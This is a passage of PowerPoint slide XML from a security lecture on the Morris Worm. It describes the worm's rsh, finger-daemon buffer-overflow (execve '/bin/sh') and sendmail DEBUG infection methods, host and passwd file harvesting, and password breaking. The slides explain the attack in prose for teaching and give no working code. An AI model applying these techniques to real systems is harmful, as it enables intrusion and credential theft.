          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="421821" y="1345906"/>
            <a:ext cx="11585122" cy="492950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endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Directly use RSH – Remote Shell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Finger daemon (only on VAXs, on Sun core dump)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Connect to remote daemon and pass 536 bytes string</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Overflowing its input buffer and overwriting parts of the stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Return stack frame for the main routine being changed so that the return address pointed into the buffer on the stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Remote execute “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>execve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(“/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>”, 0, 0)”, which opens remote shell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Sendmail</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Get into a dialog with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sendmail</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> daemon (Port #25)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1428750" lvl="2" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DEBUG-Mode</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1428750" lvl="2" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Execute commands via the user address field (“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>rcpt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to”) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1428750" lvl="2" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Vector program in the data part of the mail</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Local shell on victim machine create, compile and execute vector program</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Rechteck 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2800389" y="1206394"/>
            <a:ext cx="6523185" cy="363625"/>
          </a:xfrm>
          <a:prstGeom prst="rect">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Main Goal: Open Remote Shell or directly transfer Vector Program</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="19" name="Gruppieren 18"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7982672" y="4643715"/>
            <a:ext cx="3871871" cy="1200329"/>
            <a:chOff x="8356922" y="4480368"/>
            <a:chExt cx="3655044" cy="1200329"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="Rechteck 15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8356922" y="4480368"/>
              <a:ext cx="3599049" cy="91343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17" name="Textfeld 16"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8356922" y="4480368"/>
              <a:ext cx="3599049" cy="646331"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="003366"/>
                  </a:solidFill>
                  <a:latin typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                </a:rPr>
                <a:t>ü</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18" name="Textfeld 17"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8866208" y="4480368"/>
              <a:ext cx="3145758" cy="1200329"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" i="1" dirty="0"/>
                <a:t>As soon as one method succeeded the host entry in internal list marked as “infected”</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:endParaRPr lang="en-US" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="20" name="Gruppieren 19"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9536578" y="66468"/>
            <a:ext cx="2489521" cy="764304"/>
            <a:chOff x="318444" y="1887083"/>
            <a:chExt cx="9544735" cy="3113466"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="21" name="Grafik 20"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="3005659" y="2873782"/>
              <a:ext cx="1599701" cy="1915513"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="22" name="Grafik 21"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="7886594" y="2332213"/>
              <a:ext cx="1009598" cy="1318813"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="23" name="Grafik 22"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="8751919" y="2593800"/>
              <a:ext cx="1009598" cy="1318813"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="24" name="Grafik 23"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="7881854" y="3450858"/>
              <a:ext cx="1009598" cy="1318813"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="25" name="Grafik 24"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="8853581" y="3681736"/>
              <a:ext cx="1009598" cy="1318813"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="26" name="Gruppieren 25"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="318444" y="1887083"/>
              <a:ext cx="2841445" cy="2118378"/>
              <a:chOff x="318444" y="1887083"/>
              <a:chExt cx="2841445" cy="2118378"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="41" name="Textfeld 40"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="318444" y="3253207"/>
                <a:ext cx="2488555" cy="752254"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln>
                <a:solidFill>
                  <a:srgbClr val="003366"/>
                </a:solidFill>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" sz="400" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="003366"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>1. </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="200" dirty="0"/>
                  <a:t>Gather information about network interfaces (incl. reachability tests)</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="42" name="Rechteck 41"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1426352" y="1887083"/>
                <a:ext cx="1733537"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List of Target Machines</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" sz="200" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Host A</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" sz="200" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>…</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" sz="200" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>…</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="43" name="Verbinder: gewinkelt 42"/>
              <p:cNvCxnSpPr>
                <a:endCxn id="42" idx="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm rot="5400000" flipH="1" flipV="1">
                <a:off x="709388" y="2536244"/>
                <a:ext cx="960139" cy="473789"/>
              </a:xfrm>
              <a:prstGeom prst="bentConnector2">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27" name="Gruppieren 26"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="3159889" y="1943546"/>
              <a:ext cx="4636275" cy="1346876"/>
              <a:chOff x="3159889" y="1943546"/>
              <a:chExt cx="4636275" cy="1346876"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="37" name="Gruppieren 36"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="4613700" y="1943546"/>
                <a:ext cx="3182464" cy="1346876"/>
                <a:chOff x="4476250" y="1573153"/>
                <a:chExt cx="3182464" cy="1346876"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="39" name="Textfeld 38"/>
                <p:cNvSpPr txBox="1"/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="4560254" y="1573153"/>
                  <a:ext cx="3071495" cy="752254"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:srgbClr val="003366"/>
                </a:solidFill>
                <a:ln>
                  <a:solidFill>
                    <a:srgbClr val="003366"/>
                  </a:solidFill>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr wrap="square" rtlCol="0">
                  <a:spAutoFit/>
                </a:bodyPr>
                <a:lstStyle/>
                <a:p>
                  <a:r>
                    <a:rPr lang="en-US" sz="400" dirty="0">
                      <a:solidFill>
                        <a:srgbClr val="003366"/>
                      </a:solidFill>
                    </a:rPr>
                    <a:t>2. </a:t>
                  </a:r>
                  <a:r>
                    <a:rPr lang="en-US" sz="200" dirty="0"/>
                    <a:t>Infection attempts: </a:t>
                  </a:r>
                  <a:br>
                    <a:rPr lang="en-US" sz="200" dirty="0"/>
                  </a:br>
                  <a:r>
                    <a:rPr lang="en-US" sz="200" dirty="0"/>
                    <a:t>(1.) RSH, (2.) Finger, (3.) </a:t>
                  </a:r>
                  <a:r>
                    <a:rPr lang="en-US" sz="200" dirty="0" err="1"/>
                    <a:t>Sendmail</a:t>
                  </a:r>
                  <a:endParaRPr lang="en-US" sz="200" dirty="0"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="40" name="Pfeil: nach rechts 39"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="4476250" y="2642236"/>
                  <a:ext cx="3182464" cy="27779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
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="38" name="Gerade Verbindung mit Pfeil 37"/>
              <p:cNvCxnSpPr>
                <a:stCxn id="42" idx="3"/>
                <a:endCxn id="39" idx="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3159889" y="2293068"/>
                <a:ext cx="1537817" cy="26605"/>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72552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Morris Worm: 5 State Machine</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Inhaltsplatzhalter 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="269421" y="1193506"/>
            <a:ext cx="11585122" cy="1444360"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Collect information about users and hosts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Files to find hosts: /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hosts.equiv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, .forward file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>File to find users/passwords: /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>passwd</a:t>
            </a:r>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17</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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="28" name="Gruppieren 27"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5314708" y="2289909"/>
            <a:ext cx="6364147" cy="2450801"/>
            <a:chOff x="5314708" y="2289909"/>
            <a:chExt cx="6364147" cy="2450801"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="20" name="Rechteck 19"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6454634" y="3400553"/>
              <a:ext cx="4650298" cy="6713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rPr>
                <a:t>Account:abskjdhfksf:100:5:User, </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" dirty="0">
                  <a:solidFill>
                    <a:sysClr val="windowText" lastClr="000000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>		Name:/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" err="1">
                  <a:solidFill>
                    <a:sysClr val="windowText" lastClr="000000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>usr</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0">
                  <a:solidFill>
                    <a:sysClr val="windowText" lastClr="000000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>/account:/bin/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" err="1">
                  <a:solidFill>
                    <a:sysClr val="windowText" lastClr="000000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>sh</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="21" name="Legende: mit Linie ohne Rahmen 20"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5314708" y="2766350"/>
              <a:ext cx="1493134" cy="634203"/>
            </a:xfrm>
            <a:prstGeom prst="callout1">
              <a:avLst>
                <a:gd name="adj1" fmla="val 55251"/>
                <a:gd name="adj2" fmla="val 94768"/>
                <a:gd name="adj3" fmla="val 112500"/>
                <a:gd name="adj4" fmla="val 110504"/>
              </a:avLst>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="38100">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ysClr val="windowText" lastClr="000000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>accountname</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="22" name="Legende: mit Linie ohne Rahmen 21"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6788452" y="2412119"/>
              <a:ext cx="1082625" cy="634203"/>
            </a:xfrm>
            <a:prstGeom prst="callout1">
              <a:avLst>
                <a:gd name="adj1" fmla="val 64376"/>
                <a:gd name="adj2" fmla="val 91497"/>
                <a:gd name="adj3" fmla="val 158127"/>
                <a:gd name="adj4" fmla="val 108006"/>
              </a:avLst>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="38100">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password</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="23" name="Legende: mit Linie ohne Rahmen 22"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8166373" y="2289909"/>
              <a:ext cx="1039364" cy="634203"/>
            </a:xfrm>
            <a:prstGeom prst="callout1">
              <a:avLst>
                <a:gd name="adj1" fmla="val 69851"/>
                <a:gd name="adj2" fmla="val 51714"/>
                <a:gd name="adj3" fmla="val 183678"/>
                <a:gd name="adj4" fmla="val 51694"/>
              </a:avLst>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="38100">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ysClr val="windowText" lastClr="000000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>UserID</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="24" name="Legende: mit Linie ohne Rahmen 23"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9371334" y="2386955"/>
              <a:ext cx="1189963" cy="634203"/>
            </a:xfrm>
            <a:prstGeom prst="callout1">
              <a:avLst>
                <a:gd name="adj1" fmla="val 55251"/>
                <a:gd name="adj2" fmla="val 13851"/>
                <a:gd name="adj3" fmla="val 165427"/>
                <a:gd name="adj4" fmla="val -31150"/>
              </a:avLst>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="38100">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ysClr val="windowText" lastClr="000000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>GroupID</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="25" name="Legende: mit Linie ohne Rahmen 24"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9916937" y="2844122"/>
              <a:ext cx="1187994" cy="634203"/>
            </a:xfrm>
            <a:prstGeom prst="callout1">
              <a:avLst>
                <a:gd name="adj1" fmla="val 55251"/>
                <a:gd name="adj2" fmla="val 13851"/>
                <a:gd name="adj3" fmla="val 103375"/>
                <a:gd name="adj4" fmla="val -28500"/>
              </a:avLst>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="38100">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ysClr val="windowText" lastClr="000000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>UserInfo</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="26" name="Legende: mit Linie ohne Rahmen 25"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9840915" y="4106507"/>
              <a:ext cx="1837940" cy="634203"/>
            </a:xfrm>
            <a:prstGeom prst="callout1">
              <a:avLst>
                <a:gd name="adj1" fmla="val 51601"/>
                <a:gd name="adj2" fmla="val 10072"/>
                <a:gd name="adj3" fmla="val -9780"/>
                <a:gd name="adj4" fmla="val -32543"/>
              </a:avLst>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="38100">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Home account</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Inhaltsplatzhalter 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="268714" y="2997843"/>
            <a:ext cx="11585122" cy="31282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a:t>Break passwords:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="2"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>By using simple choice based on: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
